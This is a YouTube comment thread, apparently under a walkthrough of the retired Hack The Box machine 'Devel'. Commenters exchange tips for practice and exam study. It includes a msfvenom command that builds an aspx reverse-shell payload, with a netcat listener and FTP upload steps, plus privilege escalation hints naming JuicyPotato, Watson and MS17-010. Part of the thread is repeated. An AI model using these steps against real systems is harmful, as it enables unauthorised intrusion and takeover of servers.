I watched the walkthrough of The Cyber Mentor and came here to see any exploits without Metasploit, however, the first sentence is "I'll do it only with Metasploit" 😆 still great content, thanks for that!
So I finally did it manually. Some hints are you can compile on older version of Watson 0.1 (github.com/rasta-mouse/Watson ) that is compatible with the server's build in order to enumerate some working vulnerabilities. From there you should be able to compile a working vuln PoC, and get system. ;)
I was looking into the same issue. We are able to use the multihandler in the exam, and I attempted to create a stageless exploit (windows/shell_reverse_tcp) using msfvenom to then catch the reverse shell using the multihandler and not meterpreter. I have not had success as the multihandler attempts to upload the DLL which in this case I do-not think will work.
@@Gravitized it will work if you use the following msfvenom -p windows/shell_reverse_tcp LHOST=yourip RHOST=your port -f aspx > filename.aspx You will need ncat running using nc -nvlp portnumber This will catch the shell and you will be in
@@eltonsjohn1416 hi, you have to use multi handler to proceed with the connection? Or can it be done through netcat? I am new to this, studing The Cyber Mentor's udemy course. Thx
In msfvenom, what if my payload file would be exe for this particular machine instead of aspx.. Would that still works?? If not how would I know the correct file type??
Thanks for this awesome video. What happens if you type whoami on the shell you have at 9:35? Aren’t you already root? Why do you need to trigger another payload?
I am not exactly sure how users work in windows, but it seems that the IIS server is managed by user apppool (which is what you get after typing whoami), so it make sense that the reverse shell will be launched under that user. He still needs to escalate to root. You can find here the list of users that are used by IIS: stackoverflow.com/questions/5729264/what-are-all-the-user-accounts-for-iis-asp-net-and-how-do-they-differ
at 4:34 when I enter for get windows payload all I'm doing i this stage will result just msfvenom help. I used options, grep and did this tens times, what is wrong with it?do I need to run msfvenom on specific directory or something? thanks
Do you have maybe a walktrough that avoids using meterpreter/msf? I am trying to root the boxes without these tools as it is allowed only once during the OSCP. My reverse shell immadiately closes for some reason. Great job anyway :)
What could the issue be if I don't see the command line at 9:12 and I got straight into the meterpreter command line? In other words I cannot type "sessions -i 1" because I am already in the next level that starts with "meterpretor" for some reason...
@ippsec trying something just like this on a very similar box but when I navigate to the aspx file via the url it doesn’t execute the file/script to give me the shell, it only gives me a pop up window and an option to save the file. Why would an FTP server do this?
Sounds like a permission issue. Should set an aspx server up and modify permissions of aspx files and note the behavior. Could also be configured to not execute files out of a directory or owner by a user
Hey. First thanks for all of your walkthroughs. Second - I have run across this problem on this box and one other. Even when following your tutorial exactly I have the issue... so clearly the problem is on my end. I cannot get my aspx file to execute. Even with the exact msfvenom command, you use... it doesn't work. When I browse to the shell file on the server the text of the shellcode displays but does not execute. I'm not finding any answers in my research. Any tips?
did you try to upload a regular text within the aspx file to make sure your payloads are getting uploaded? or perhaps you need to check what is your htb ip when setting up the lhost option on msfvenom
Hey Ippsec, what could I do to see that I spend less time researching, and get directly onto the exploit. any suggestions on that would be very helpful.
@ippsec Any hints on MS17-010 exploit for Win 7 Enterprise x86? I am trying to elevate by exposing devel local SMB ports through chisel and it clearly vulnerable to MS17-010 but for crying out loud I can't get any typical eternal_blue exploits to work.
Right now I'm currently working on retired boxes to further improve my skills before taking CRTP and OSCP. While I was working on this box, I initially used the webdav_upload_asp module and it worked got the SYSTEM user directly without sweat, however I got disconnected, I tried the exploit again and it's not working anymore.
How is this an easy one? How does a beginner learn all these intricacies? Do I just have to keep watching walkthroughs until I collect enough knowledge to do it myself?
Another amazing walkthrough I enjoyed every walkthrough of yours. Btw im New to ctf how can i start my journey ? And how to get that mindset that after this i have to try this i get too confused what to do next
When there's a machine queued up it will be on the unreleased tab. There isn't one currently queued up for next week. It should be optimum next, as that is the one that should of retired today
thanks a lot for tutorial, subscribe with ball ^^, i owned the machine but something seems to be odd happen with me about msfvenom ( msfvenom -l | grep windows ) not working at all with me this command every time i tried, i got display about help command ( -h ) idk
Good, now I know that you have a VIP account because I tried the same vector and same exploit but it did not work XD so it works better to vip accounts sh*t!!
I did this box before VIP was even introduced. Use VIP for videos as there's less chance someone screws with the machine while I'm recording. The only difference between non-VIP and VIP is the number of users in the environment. Just revert the box before you begin and should be good to go. If someone cancels the revert, then you know its being worked on.
"We actually crashed the box.... That is unique."
I lol'ed there.
This is supposed to be an easy box? God help me XD
I am like you xD
I watched the walkthrough of The Cyber Mentor and came here to see any exploits without Metasploit, however, the first sentence is "I'll do it only with Metasploit" 😆 still great content, thanks for that!
Same, I can't figure out the priv esc on this box without using Metasploit. :/
So I finally did it manually. Some hints are you can compile on older version of Watson 0.1 (github.com/rasta-mouse/Watson ) that is compatible with the server's build in order to enumerate some working vulnerabilities. From there you should be able to compile a working vuln PoC, and get system. ;)
@@TheDexxra Also you can impersonate token with juicy-potato and get SYSTEM shell
ich frage mich wieso php shell nicht funktioniert
I like that dramatic pause when /test didnt work, but you got out like champ. Keep up great work!
Thank you so much darlin💋❤. This is delicious. Taught like a Jedi master.
I learn everyday with your videos...! Thanks a lot for share, really.
The øœrchitecture of the machine
thank you for the video, as for me in the priviledge escalation , it need to change to %TEMP% otherwise second one didn't work.
but how to perform privilege es cation without metasploit??? in oscp metasploit use is limited.
only one time! that its
I was looking into the same issue. We are able to use the multihandler in the exam, and I attempted to create a stageless exploit (windows/shell_reverse_tcp) using msfvenom to then catch the reverse shell using the multihandler and not meterpreter. I have not had success as the multihandler attempts to upload the DLL which in this case I do-not think will work.
@@Gravitized it will work if you use the following msfvenom -p windows/shell_reverse_tcp LHOST=yourip RHOST=your port -f aspx > filename.aspx
You will need ncat running using nc -nvlp portnumber
This will catch the shell and you will be in
@@eltonsjohn1416 hi, you have to use multi handler to proceed with the connection? Or can it be done through netcat? I am new to this, studing The Cyber Mentor's udemy course. Thx
In msfvenom, what if my payload file would be exe for this particular machine instead of aspx.. Would that still works?? If not how would I know the correct file type??
Thanks for this awesome video.
What happens if you type whoami on the shell you have at 9:35? Aren’t you already root? Why do you need to trigger another payload?
I am not exactly sure how users work in windows, but it seems that the IIS server is managed by user apppool (which is what you get after typing whoami), so it make sense that the reverse shell will be launched under that user. He still needs to escalate to root. You can find here the list of users that are used by IIS: stackoverflow.com/questions/5729264/what-are-all-the-user-accounts-for-iis-asp-net-and-how-do-they-differ
at 4:34 when I enter for get windows payload all I'm doing i this stage will result just msfvenom help. I used options, grep and did this tens times, what is wrong with it?do I need to run msfvenom on specific directory or something? thanks
Recently tried out this box, actually JuicyPotato can be used for privilege escalation!
Yeah that how I did it worked easy enough ! glad I found it by my own.
Couldn't figure out how you put session in background. Ended up causing it to crash and now i'm so lost.
Everything works fine until i try to run local exploit suggester and the session died, what causing this?
Hey, I saw your comment here and under a Cyber Mentor vid. Got a fix for it?
Do you have maybe a walktrough that avoids using meterpreter/msf? I am trying to root the boxes without these tools as it is allowed only once during the OSCP. My reverse shell immadiately closes for some reason.
Great job anyway :)
Check Bastard or Optimum, those I don’t use metasploit. I do my best to not repeat tools, techniques, or procedures.
What could the issue be if I don't see the command line at 9:12 and I got straight into the meterpreter command line? In other words I cannot type "sessions -i 1" because I am already in the next level that starts with "meterpretor" for some reason...
Did you ever find a solution?
@ippsec trying something just like this on a very similar box but when I navigate to the aspx file via the url it doesn’t execute the file/script to give me the shell, it only gives me a pop up window and an option to save the file. Why would an FTP server do this?
Sounds like a permission issue. Should set an aspx server up and modify permissions of aspx files and note the behavior. Could also be configured to not execute files out of a directory or owner by a user
Did you get this figured out? I am having the same problem.
Its really simple and easy to hack.. !
Ippsec you are the best !
Hey. First thanks for all of your walkthroughs. Second - I have run across this problem on this box and one other. Even when following your tutorial exactly I have the issue... so clearly the problem is on my end. I cannot get my aspx file to execute. Even with the exact msfvenom command, you use... it doesn't work. When I browse to the shell file on the server the text of the shellcode displays but does not execute. I'm not finding any answers in my research. Any tips?
did you try to upload a regular text within the aspx file to make sure your payloads are getting uploaded? or perhaps you need to check what is your htb ip when setting up the lhost option on msfvenom
hackthebox also has a discord. look it up!
Did you ever find a solution?
hello what command you use to exit meterpreter to background session 1 ? in 9:56
just type background
Hey Ippsec, what could I do to see that I spend less time researching, and get directly onto the exploit. any suggestions on that would be very helpful.
That takes experience and exposure research is important
@ippsec Any hints on MS17-010 exploit for Win 7 Enterprise x86? I am trying to elevate by exposing devel local SMB ports through chisel and it clearly vulnerable to MS17-010 but for crying out loud I can't get any typical eternal_blue exploits to work.
Right now I'm currently working on retired boxes to further improve my skills before taking CRTP and OSCP. While I was working on this box, I initially used the webdav_upload_asp module and it worked got the SYSTEM user directly without sweat, however I got disconnected, I tried the exploit again and it's not working anymore.
i directly uploaded aspx reverse shell to ftp and called nc . but stuck with priv esc. trying to make something without msfconsole. also trying oscp
What did you use ruby for? I did not see the window for ruby come up.
Can you explain why you used ruby?
Metasploit probably.
Tmux renames tabs and is no always right.
How is this an easy one? How does a beginner learn all these intricacies? Do I just have to keep watching walkthroughs until I collect enough knowledge to do it myself?
Another amazing walkthrough I enjoyed every walkthrough of yours. Btw im New to ctf how can i start my journey ? And how to get that mindset that after this i have to try this i get too confused what to do next
Hows your journey are you a really good at ctfs now???
cant I upload a reverse shell through ftp and call it from the web (I'm new to windows)
I think that's exactly what IppSec is doing here. Here is making the server execute code by navigating to the uploaded payload.
sir, why did you changed the port to 4449 instead of 4444 because in payload you have given 4444 port .
Because there was already open connection on port 4444 with meterpreter msfvenom payload.
why was apsx chosen and not asp ?
Can u use LFI to get a shell?
How we can solve this without metasploit?
I'm sure if you watch more video's you'll figure it out easily.
with juicypotato probably
Thanks
It's only been retired a few hours, you didn't waste any time did u? Skynet...lol
Nope. Try my best to have videos up an hour before new box launches
Let's go over to a Ruby window with no explanation on how that's done.
04:16 clue is good, asp and aspx
not completed
How can i know when a machine will be retired ??
When there's a machine queued up it will be on the unreleased tab. There isn't one currently queued up for next week. It should be optimum next, as that is the one that should of retired today
easy box ! thx
thanks a lot for tutorial, subscribe with ball ^^, i owned the machine but something seems to be odd happen with me about msfvenom ( msfvenom -l | grep windows ) not working at all with me this command every time i tried, i got display about help command ( -h ) idk
did you get that grep windows command to work, im having the same issue.
ok i found out the fix, you have to give a proper argue for -l. i used the following "msfvenom -l payloads | grep windows"
Good, now I know that you have a VIP account because I tried the same vector and same exploit but it did not work XD so it works better to vip accounts sh*t!!
I did this box before VIP was even introduced. Use VIP for videos as there's less chance someone screws with the machine while I'm recording. The only difference between non-VIP and VIP is the number of users in the environment. Just revert the box before you begin and should be good to go. If someone cancels the revert, then you know its being worked on.
1:01 Shouldn't that be "I've already *run* this"?
If you're coming to my videos for proper grammar//parts of speach while speaking, you're in the wrong place. ha.